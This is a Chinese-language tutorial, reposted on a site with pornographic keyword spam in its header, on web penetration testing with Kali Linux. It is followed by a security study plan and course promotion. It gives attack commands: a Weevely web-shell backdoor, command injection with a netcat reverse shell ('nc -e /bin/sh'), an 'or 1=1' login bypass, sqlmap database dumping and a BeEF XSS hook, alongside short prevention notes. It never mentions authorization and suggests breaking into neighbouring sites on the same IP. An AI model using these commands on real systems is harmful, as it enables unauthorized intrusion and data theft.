国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

使用 Kali Linux 進(jìn)行 Web 滲透測試

這篇具有很好參考價值的文章主要介紹了使用 Kali Linux 進(jìn)行 Web 滲透測試。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

Web滲透:如何使用 Kali Linux 來訪問目標(biāo) PC!什么是 Kali Linux?“Kali Linux 是一個基于 Debian 的 Linux 發(fā)行版,旨在進(jìn)行高級滲透測試和安全審核”。

網(wǎng)絡(luò)信息收集

在Web滲透中,信息就是力量、就是安全。因此,我們總是首先收集盡可能多的有關(guān)目標(biāo)的信息——因為這可能會告訴我們實施攻擊的最佳方式。

一臺計算機(同一IP)上可以安裝多個網(wǎng)站。如果您無法進(jìn)入目標(biāo),請嘗試侵入另一個網(wǎng)站。獲取同一 IP 上的網(wǎng)站(Robtex 除外)的另一種方法是使用 bing 和 search ip。

使用 Kali Linux 進(jìn)行 Web 滲透測試,linux,前端,運維,服務(wù)器,安全

發(fā)現(xiàn)子域

使用名為“knock”的工具(通常安裝到 Kali 上的 /opt 中)。與 Kali Linux 上的大多數(shù)工具一樣,Knock 是開源的,可以在https://github.com/guelfoweb/knock找到。

git clone <https://github.com/guelfoweb/knock.git>
cd 進(jìn)入文件夾。
python knock.py 目標(biāo)

如果不起作用,嘗試使用 --resolve 運行上述命令,然后再次運行上述命令。

發(fā)現(xiàn)敏感文件

DIRB 是一個 Web 內(nèi)容掃描器,它查找現(xiàn)有(或隱藏)的 Web 對象,在Web滲透中非常有用!DIRB 的工作原理是對 Web 服務(wù)器發(fā)起字典攻擊并分析響應(yīng)(本質(zhì)上只是嘗試不同的文件名并查看是否有響應(yīng))。

dirb [目標(biāo)] [字典] [選項]

  1. /:通常表示您位于一個目錄中。
  2. phpinfo.php:非常有用的信息
  3. robots.txt:管理員不希望我們看到的隱藏信息。

利用服務(wù)器漏洞

利用服務(wù)器漏洞進(jìn)行Web滲透到常見方式,以下是利用 Web 服務(wù)器獲得不同結(jié)果的一系列方法。

利用文件上傳漏洞獲取訪問權(quán)限

Weevely 是一個隱秘的 Web shell,用于模擬類似 telnet 的連接。這可用作后門和/或管理 Web 服務(wù)器上的 Web 帳戶。

創(chuàng)建后門:

weevly generate [密碼] [路徑+文件名]

上傳文件:

weevly [文件地址]- 連接到文件

在嘗試使用工具之前,只需瀏覽網(wǎng)站并感受一下,尋找功能中的漏洞,特別是網(wǎng)站是否允許上傳。

利用代碼執(zhí)行漏洞

始終嘗試您看到的任何輸入框,因為它們正在執(zhí)行命令,您也許可以更改該命令。
可以使用" && “或” ; "在unix中,可以在一行中執(zhí)行多個命令。測試輸入框是否允許這樣做。
大多數(shù)服務(wù)器都有 python 和 netcat。
監(jiān)聽傳入連接,例如使用 netcat:

netcat -vv -l -p [端口]- 偵聽端口 8080 上的連接
IE。nc -e /bin/sh [ip] [端口] - netcat 連接。

下面是您可以執(zhí)行以獲得不同受支持語言的反向連接的命令列表。其中要更改的變量由[HOST_IP]和 表示,可以選擇更改端口。請注意,這些都是“一行代碼”,因此它們可以在輸入框中執(zhí)行。

預(yù)防 Web 服務(wù)器漏洞

發(fā)生上述情況只是因為服務(wù)器允許并且配置錯誤。

  1. 文件上傳漏洞

    • 不允許上傳不安全的文件。
    • 如果您要求提供圖像,請確保它是圖像,切勿允許 exe 上傳。
    • 檢查文件類型,而不是擴展名。
  2. 代碼執(zhí)行漏洞

    • 不要使用危險的功能,
    • 執(zhí)行前過濾輸入
    • 如果必須使用函數(shù),請確保在執(zhí)行之前分析輸入。
    • 使用正則表達(dá)式(regex)。
  3. 文件包含漏洞

    • 禁用 php 中的allow_url_fopen 和allow_url_include 設(shè)置(在/etc/php5/cgi/php.ini 中)
    • 使用靜態(tài)文件包含(對文件進(jìn)行硬編碼)

SQL注入和攻擊

連接到 mySQL 數(shù)據(jù)庫:

mysql -u [用戶名] -h [IP of server]
show 數(shù)據(jù)庫
use [數(shù)據(jù)庫]
show tables

通過注入繞過登錄

另一個巧妙的用途是注入 SQL 查詢,使得查詢最終為SELECT * from accounts where user=‘a(chǎn)dmin’ and password=‘wrong_password’ or 1=1,這可能會以管理員身份登錄我們,而根本不知道密碼,因為如果查詢評估 1 為,則 and 語句中的第二種情況將為 True等于 1。這在Web滲透中有很大的作用。

發(fā)現(xiàn)數(shù)據(jù)檢索 (GET) 中的 SQL 注入

始終嘗試在 php 腳本中注入內(nèi)容(在地址欄中,它看起來像index.php&username=xxxx&password=xxxxx)
在字段后使用 ORDER BY,例如。index.php&username=xxxx’ ORDER BY 1 #&password=xxxxx確保對符號使用 URL 編碼,即。# = %23
按列 100000 排序?qū)⒎祷劐e誤,繼續(xù)按 1,2,3,4,5 進(jìn)行排序。

使用 SQLmap 執(zhí)行上述及更多操作

sqlmap --help
sqlmap -u "[target_url]"
sqlmap -u "[target_url]" --dbs
獲取數(shù)據(jù)庫
sqlmap -u "[target_url]" --current-user
獲取用戶
sqlmap -u "[target_url]" --current-db
當(dāng)前數(shù)據(jù)庫
sqlmap -u "[target_url]" --tables -D [database]
獲取-D數(shù)據(jù)庫中的表
sqlmap -u "[target_url]" --columns -T [table_name] -D [database]
獲取數(shù)據(jù)庫表中的列
sqlmap -u "[target_url]" -T [table_name] -D [database] --dump

獲取數(shù)據(jù)庫表中的所有數(shù)據(jù)

SQL漏洞防范

  • 使用過濾器(但可以繞過)
  • 使用拒絕列表或允許列表。(但可以繞過)
  • 最好的方法是以不允許代碼注入的方式對 Web 應(yīng)用程序進(jìn)行編碼。
  • 要執(zhí)行上述操作,您必須使用參數(shù)化語句。(其中數(shù)據(jù)和代碼是分開的)

跨站腳本(XSS)

在瀏覽網(wǎng)站的人而不是服務(wù)器上執(zhí)行。允許將 javascript 注入到頁面上。頁面加載時執(zhí)行代碼。

三個主要類型

  1. 持久/存儲型 XSS
  2. 反射型 XSS - 非持久性 XSS。僅當(dāng)目標(biāo)訪問特制的網(wǎng)址時才有效,例如。target.com/page.php?something=alert(‘xss’)
  3. 基于 DOM 的 XSS

使用參數(shù)(php 的東西)測試文本框和 url。

將牛肉鉤注入易受攻擊的頁面。如果文本區(qū)域有最大長度,請進(jìn)入開發(fā)人員控制臺并檢查元素并更改最大長度。

XSS漏洞防范

  • 最小化輸入。
  • 將用戶輸入轉(zhuǎn)換為 html 字符符號 so&nsb并使用 代替 & &jsjs;。
  • 轉(zhuǎn)義輸入。
  • 很少信任瀏覽器內(nèi)的警報!

自動發(fā)現(xiàn)Web漏洞

使用 Zed Attack Proxy (zap) https://owasp.org/www-project-zap/,它已經(jīng)安裝在 Kali 上。

  1. 在應(yīng)用程序中搜索 ZAP
  2. 您必須通過 github 獲取此應(yīng)用程序。
  3. chmod +x [文件名]
  4. 運行
  5. 安裝后點擊不再持久。
  6. 左側(cè)的齒輪圖標(biāo)允許修改選項
  7. 如果您單擊底部窗口上的綠色加號,則轉(zhuǎn)到活動掃描。然后,您可以在窗口左上角的小面板中更改策略。
  8. 在自動掃描中添加 url。
  9. 警報下方的左下角顯示了所有已發(fā)現(xiàn)的漏洞。
  10. 如果您右鍵單擊其中一個警報(左下角),然后在瀏覽器中打開,它將向您顯示該漏洞及其如何獲取它。

Web滲透歸根結(jié)底還是幾個技術(shù)活,所以要學(xué)習(xí)的東西還是很多的!

接下來我將給各位同學(xué)劃分一張學(xué)習(xí)計劃表!

學(xué)習(xí)計劃

那么問題又來了,作為萌新小白,我應(yīng)該先學(xué)什么,再學(xué)什么?
既然你都問的這么直白了,我就告訴你,零基礎(chǔ)應(yīng)該從什么開始學(xué)起:

階段一:初級網(wǎng)絡(luò)安全工程師

接下來我將給大家安排一個為期1個月的網(wǎng)絡(luò)安全初級計劃,當(dāng)你學(xué)完后,你基本可以從事一份網(wǎng)絡(luò)安全相關(guān)的工作,比如滲透測試、Web滲透、安全服務(wù)、安全分析等崗位;其中,如果你等保模塊學(xué)的好,還可以從事等保工程師。

綜合薪資區(qū)間6k~15k

1、網(wǎng)絡(luò)安全理論知識(2天)
①了解行業(yè)相關(guān)背景,前景,確定發(fā)展方向。
②學(xué)習(xí)網(wǎng)絡(luò)安全相關(guān)法律法規(guī)。
③網(wǎng)絡(luò)安全運營的概念。
④等保簡介、等保規(guī)定、流程和規(guī)范。(非常重要)

2、滲透測試基礎(chǔ)(1周)
①滲透測試的流程、分類、標(biāo)準(zhǔn)
②信息收集技術(shù):主動/被動信息搜集、Nmap工具、Google Hacking
③漏洞掃描、漏洞利用、原理,利用方法、工具(MSF)、繞過IDS和反病毒偵察
④主機攻防演練:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系統(tǒng)基礎(chǔ)(1周)
①Windows系統(tǒng)常見功能和命令
②Kali Linux系統(tǒng)常見功能和命令
③操作系統(tǒng)安全(系統(tǒng)入侵排查/系統(tǒng)加固基礎(chǔ))

4、計算機網(wǎng)絡(luò)基礎(chǔ)(1周)
①計算機網(wǎng)絡(luò)基礎(chǔ)、協(xié)議和架構(gòu)
②網(wǎng)絡(luò)通信原理、OSI模型、數(shù)據(jù)轉(zhuǎn)發(fā)流程
③常見協(xié)議解析(HTTP、TCP/IP、ARP等)
④網(wǎng)絡(luò)攻擊技術(shù)與網(wǎng)絡(luò)安全防御技術(shù)
⑤Web漏洞原理與防御:主動/被動攻擊、DDOS攻擊、CVE漏洞復(fù)現(xiàn)

5、數(shù)據(jù)庫基礎(chǔ)操作(2天)
①數(shù)據(jù)庫基礎(chǔ)
②SQL語言基礎(chǔ)
③數(shù)據(jù)庫安全加固

6、Web滲透(1周)
①HTML、CSS和JavaScript簡介
②OWASP Top10
③Web漏洞掃描工具
④Web滲透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏掃等)
使用 Kali Linux 進(jìn)行 Web 滲透測試,linux,前端,運維,服務(wù)器,安全
那么,到此為止,已經(jīng)耗時1個月左右。你已經(jīng)成功成為了一名“腳本小子”。那么你還想接著往下探索嗎?

階段二:中級or高級網(wǎng)絡(luò)安全工程師(看自己能力)

綜合薪資區(qū)間15k~30k

7、腳本編程學(xué)習(xí)(4周)
在網(wǎng)絡(luò)安全領(lǐng)域。是否具備編程能力是“腳本小子”和真正網(wǎng)絡(luò)安全工程師的本質(zhì)區(qū)別。在實際的滲透測試過程中,面對復(fù)雜多變的網(wǎng)絡(luò)環(huán)境,當(dāng)常用工具不能滿足實際需求的時候,往往需要對現(xiàn)有工具進(jìn)行擴展,或者編寫符合我們要求的工具、自動化腳本,這個時候就需要具備一定的編程能力。在分秒必爭的CTF競賽中,想要高效地使用自制的腳本工具來實現(xiàn)各種目的,更是需要擁有編程能力。

零基礎(chǔ)入門的同學(xué),我建議選擇腳本語言Python/PHP/Go/Java中的一種,對常用庫進(jìn)行編程學(xué)習(xí)
搭建開發(fā)環(huán)境和選擇IDE,PHP環(huán)境推薦Wamp和XAMPP,IDE強烈推薦Sublime;

Python編程學(xué)習(xí),學(xué)習(xí)內(nèi)容包含:語法、正則、文件、 網(wǎng)絡(luò)、多線程等常用庫,推薦《Python核心編程》,沒必要看完

用Python編寫漏洞的exp,然后寫一個簡單的網(wǎng)絡(luò)爬蟲

PHP基本語法學(xué)習(xí)并書寫一個簡單的博客系統(tǒng)

熟悉MVC架構(gòu),并試著學(xué)習(xí)一個PHP框架或者Python框架 (可選)

了解Bootstrap的布局或者CSS。

階段三:頂級網(wǎng)絡(luò)安全工程師

如果你對網(wǎng)絡(luò)安全入門感興趣,那么你需要的話可以點擊這里??【整整282G!】網(wǎng)絡(luò)安全&黑客技術(shù)小白到大神全套資料,免費分享!

使用 Kali Linux 進(jìn)行 Web 滲透測試,linux,前端,運維,服務(wù)器,安全

學(xué)習(xí)資料分享

當(dāng)然,只給予計劃不給予學(xué)習(xí)資料的行為無異于耍流氓,這里給大家整理了一份【282G】的網(wǎng)絡(luò)安全工程師從入門到精通的學(xué)習(xí)資料包,可點擊下方二維碼鏈接領(lǐng)取哦。文章來源地址http://www.zghlxwxcb.cn/news/detail-817624.html

使用 Kali Linux 進(jìn)行 Web 滲透測試,linux,前端,運維,服務(wù)器,安全

到了這里,關(guān)于使用 Kali Linux 進(jìn)行 Web 滲透測試的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Kali Linux滲透測試技術(shù)詳解_滲透測試入門

    Kali Linux滲透測試技術(shù)詳解_滲透測試入門

    知識點 1. Kali Linux是做滲透測試用的 2. 安裝VMware Workstation虛擬機 3. 安裝kali-linux系統(tǒng) 4. 基本用法-重新設(shè)置root密碼 5 安裝debian11系統(tǒng)-默認(rèn)命令行模式登錄 滲透測試是通過模擬惡意黑客的攻擊方法,來評估計算機網(wǎng)絡(luò)系統(tǒng)安全的一種評估方法,這個過程包括對系統(tǒng)的任何弱點、

    2024年02月13日
    瀏覽(19)
  • 【Kali Linux】高級滲透測試實戰(zhàn)篇

    【Kali Linux】高級滲透測試實戰(zhàn)篇

    對于企業(yè)網(wǎng)絡(luò)安全建設(shè)工作的質(zhì)量保障,業(yè)界普遍遵循PDCA(計劃(Plan)、實施(Do)、檢查(Check)、處理(Act))的方法論。近年來,網(wǎng)絡(luò)安全攻防對抗演練發(fā)揮了越來越重要的作用。企業(yè)的安全管理者通過組織內(nèi)部或外部攻擊隊,站在惡意攻擊者的視角,識別自身網(wǎng)絡(luò)安

    2024年02月10日
    瀏覽(24)
  • 滲透測試(8)- Kali Linux 系統(tǒng)概述

    滲透測試(8)- Kali Linux 系統(tǒng)概述

    ??? Kali Linux 是一個基于 Debian 的 Linux 發(fā)行版,包括很多安全和取證方面的相關(guān)工具。Kali Linux 是一款全功能的安全操作系統(tǒng),它可以幫助用戶完成各種安全任務(wù),包括網(wǎng)絡(luò)滲透測試、系統(tǒng)攻擊、密碼破解、惡意軟件分析、社會工程學(xué)攻擊等,同時也可以用于安全研究,幫助

    2024年01月17日
    瀏覽(26)
  • 從實踐中學(xué)習(xí)Kali Linux滲透測試

    從實踐中學(xué)習(xí)Kali Linux滲透測試

    目錄 第一章 滲透測試概述 1.1 什么是滲透測試 1.1.1 黑盒測試 1.1.2 白盒測試 1.1.3 灰盒測試 1.2 滲透測試流程 1.3 Kali Linux系統(tǒng)概述 1.3.1 為什么使用Kali Linux 1.3.2 Kali Linux發(fā)展史 1.4 法律邊界 1.4.1 獲取合法權(quán)限 1.4.2 部分操作的危害性 第二章 安裝Kali Linux系統(tǒng) 2.1 下載鏡像 2.1.1 獲取

    2023年04月08日
    瀏覽(23)
  • Kali Linux滲透測試技術(shù)介紹【文末送書】

    Kali Linux滲透測試技術(shù)介紹【文末送書】

    對于企業(yè)網(wǎng)絡(luò)安全建設(shè)工作的質(zhì)量保障,業(yè)界普遍遵循PDCA(計劃(Plan)、實施(Do)、檢查(Check)、處理(Act))的方法論。近年來,網(wǎng)絡(luò)安全攻防對抗演練發(fā)揮了越來越重要的作用。企業(yè)的安全管理者通過組織內(nèi)部或外部攻擊隊,站在惡意攻擊者的視角,識別自身網(wǎng)絡(luò)安

    2024年02月09日
    瀏覽(27)
  • 滲透測試-Kali Linux 正確清理垃圾的姿勢

    滲透測試-Kali Linux 正確清理垃圾的姿勢

    當(dāng)kali在運行和我們“腎透”過程中會產(chǎn)生很多的垃圾文件。如何正確的清理這些垃圾文件呢?stacer是一款圖形化的垃圾清理和系統(tǒng)管理工具。有進(jìn)程管理、開機啟動項管理、可視化軟件安裝和卸載。對于不熟悉Linux命令的小白而言是非常友好的。 apt-get install stacer apt-get remo

    2024年02月02日
    瀏覽(24)
  • 【小吉送書—第一期】Kali Linux高級滲透測試

    【小吉送書—第一期】Kali Linux高級滲透測試

    對于企業(yè)網(wǎng)絡(luò)安全建設(shè)工作的質(zhì)量保障,業(yè)界普遍遵循PDCA(計劃(Plan)、實施(Do)、檢查(Check)、處理(Act))的方法論。近年來,網(wǎng)絡(luò)安全攻防對抗演練發(fā)揮了越來越重要的作用。企業(yè)的安全管理者通過組織內(nèi)部或外部攻擊隊,站在惡意攻擊者的視角,識別自身網(wǎng)絡(luò)安

    2024年02月10日
    瀏覽(18)
  • 滲透測試學(xué)習(xí)(一)—— Kali Linux的安裝圖文詳解

    滲透測試學(xué)習(xí)(一)—— Kali Linux的安裝圖文詳解

    目錄 一、Kali Linux 2022.4鏡像下載 二、VMware 安裝 Kali 鏡像 安裝版的Kali 免安裝版Kali官方VMware鏡像 打開Kali官網(wǎng) www.kali.org 點擊Download跳轉(zhuǎn)到下載界面,這里我們選擇虛擬機版本,博主采用的是VMware虛擬環(huán)境搭建,選擇合適的下載方式。 直接下載可能比較慢,我們可以選擇torre

    2024年02月02日
    瀏覽(23)
  • 用于黑客滲透測試的 21 個最佳 Kali Linux 工具

    用于黑客滲透測試的 21 個最佳 Kali Linux 工具

    如果你讀過 Kali Linux 點評,你就知道為什么它被認(rèn)為是最好的黑客滲透測試的 Linux 發(fā)行版之一,而且名副其實。它帶有許多工具,使你可以更輕松地測試、破解以及進(jìn)行與數(shù)字取證相關(guān)的任何其他工作。 它是道德黑客ethical hacker最推薦的 Linux 發(fā)行版之一。即使你不是黑客而

    2024年02月10日
    瀏覽(23)
  • Kali Linux滲透測試小實踐——Metasploit與后門木馬

    Kali Linux滲透測試小實踐——Metasploit與后門木馬

    目錄 一、環(huán)境和工具準(zhǔn)備 1.Metasploit 2.Kali Linux與靶機 二、實踐過程 1.打開Kali Linux,進(jìn)入終端 2.輸入生成木馬的命令,并配置相關(guān)參數(shù) Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業(yè)人士識別安全性問題,驗證漏洞的緩解措施,并管理專家驅(qū)動的安全性進(jìn)行評

    2024年02月13日
    瀏覽(31)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包